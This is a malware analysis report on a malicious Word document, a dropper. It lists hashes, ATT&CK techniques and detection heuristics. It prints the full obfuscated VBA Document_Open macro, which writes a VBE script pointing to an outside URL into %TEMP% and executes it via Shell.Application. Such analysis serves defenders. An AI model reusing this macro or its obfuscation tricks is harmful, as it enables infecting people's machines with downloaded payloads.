Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 56b68e35abfac35b…

MALICIOUS

Office (OLE)

Size: 34.5 KB
Created: 2016-03-20 18:37:00
Authoring application: Microsoft Office Word
First seen: 2019-02-04
MD5: 038ddddbbc0bd712fa148b388ce738e9
SHA-1: 3f0dc94094d1c80fb8d29860cf778a3a9b236959
SHA-256: 56b68e35abfac35b77bfd65d5ccb9e9003ead4d93bc1bbe28ecb31f83738b528
Risk score: 210

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, a common technique for automatic execution when the document is opened. The macro builds a path under the %TEMP% directory from concatenated string fragments, writes a string containing a URL (plus the contents of a form text box) to that file, then creates a Shell.Application object via CreateObject and calls Open on the file, causing it to be executed; this is consistent with downloading and running a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-1564641' further supports its classification as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-1564641 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-1564641
  • VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Environ() call (env variable access)
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://connect.businesshelpa-z.com/dana/home.php (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1749 bytes
SHA-256: a625b4b8063baf3957433968783a96f759467875d049321c088fac8ae305a30b

Extracted script (first 1,000 lines shown):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim nbvcxzasd
sadasdlonk = "HGFDSEWRF = ""http://connect.businesshelpa-z.com/dana/home.php"""
ihasdls = "hel"
hasbkj = "dfsdf"
saper = "plica"
jkbzkxc = ".V"
Dim LRnypy As String
Dim AylquPK As Integer
Dim NESRGxixz As Integer
Dim amlriThqqCe As Long
Dim RZhMUYS, MKBAavWTAriycfdxu, uwTNIKeu, oEywRhug As String
Dim Kct As String
Dim gTgHnebIocrnd As Integer
Dim hRLehXpUsDThXcWIzyPSP As Integer
Dim jbsbBgVZTCCNVQ As Long
Dim UveeUk As Single, yMIULwHkqjXQhXdql As Byte, oNEKlftiDYfhtIZR As String, AOqkNrbgWkGcrLg As String
If "aTSVMAXZIFmC" = "bBFwK" Then
GoTo Qdhvmos
Qdhvmos:
MsgBox "ELnAcKwVqMVPVuYVahRe", vbCritical, "rUMppvdPwncHXQqpLE"
End If
     Dim yhtgfdcxc As Integer
     yhtgfdcxc = FreeFile
          hgvfcdsfdsfff = Environ("TEMP") & "\dsfs" + hasbkj + jkbzkxc + "BE"
          
    Open hgvfcdsfdsfff For Output As #yhtgfdcxc
    Print #yhtgfdcxc, sadasdlonk
    Print #yhtgfdcxc, UserForm1.TextBox1
            Close #yhtgfdcxc
            
Set HGFDSAD = CreateObject("S" + ihasdls + "l.Ap" + saper + "tion")
HGFDSAD.Open hgvfcdsfdsfff
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{3828C63F-042E-4DE1-9B9D-B412647B02B2}{7D07ED3A-5DB4-4208-900C-63002873D5E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False